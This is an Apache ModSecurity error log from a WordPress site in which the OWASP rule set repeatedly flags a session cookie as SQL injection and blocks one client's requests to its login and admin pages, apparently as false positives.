[Mon May 11 22:19:52.540661 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-json/wp/v2/users"] [unique_id "agI56KFW67LJTsgN3jQJ-wAAAAg"]
[Mon May 11 22:19:52.540950 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-json/wp/v2/users"] [unique_id "agI56KFW67LJTsgN3jQJ-wAAAAg"]
[Mon May 11 22:19:53.361119 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI56KFW67LJTsgN3jQJ-wAAAAg"]
[Mon May 11 22:19:53.645613 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI56aFW67LJTsgN3jQJ_QAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:19:53.645908 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI56aFW67LJTsgN3jQJ_QAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:19:54.215065 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI56aFW67LJTsgN3jQJ_QAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:19:54.431702 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI56qFW67LJTsgN3jQJ_wAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:19:54.431998 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI56qFW67LJTsgN3jQJ_wAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:19:55.055937 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI56qFW67LJTsgN3jQJ_wAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:19:55.256995 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI566FW67LJTsgN3jQKAQAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:19:55.257329 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI566FW67LJTsgN3jQKAQAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:19:55.636745 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI566FW67LJTsgN3jQKAQAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:19:56.155787 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI57KFW67LJTsgN3jQKBgAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:19:56.156074 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI57KFW67LJTsgN3jQKBgAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:19:56.889047 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI57KFW67LJTsgN3jQKBgAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:19:57.358920 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI57aFW67LJTsgN3jQKDQAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:19:57.359232 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI57aFW67LJTsgN3jQKDQAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:19:57.996969 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI57aFW67LJTsgN3jQKDQAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:19:58.437314 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI57qFW67LJTsgN3jQKDwAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:19:58.437597 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI57qFW67LJTsgN3jQKDwAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:19:59.085917 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI57qFW67LJTsgN3jQKDwAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:19:59.545410 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI576FW67LJTsgN3jQKEgAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:19:59.545695 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI576FW67LJTsgN3jQKEgAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:00.121082 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI576FW67LJTsgN3jQKEgAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:00.345925 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI58KFW67LJTsgN3jQKEwAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:00.346233 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI58KFW67LJTsgN3jQKEwAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:00.898614 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI58KFW67LJTsgN3jQKEwAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:01.145603 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI58aFW67LJTsgN3jQKFQAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:01.145957 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI58aFW67LJTsgN3jQKFQAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:01.526337 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI58aFW67LJTsgN3jQKFQAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:02.338375 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI58qFW67LJTsgN3jQKGAAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:02.338657 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI58qFW67LJTsgN3jQKGAAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:02.961033 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI58qFW67LJTsgN3jQKGAAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:03.401646 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI586FW67LJTsgN3jQKGgAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:03.401943 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI586FW67LJTsgN3jQKGgAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:04.381755 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI586FW67LJTsgN3jQKGgAAAAg"], referer: https://rentparadise.fr/wp-login.php
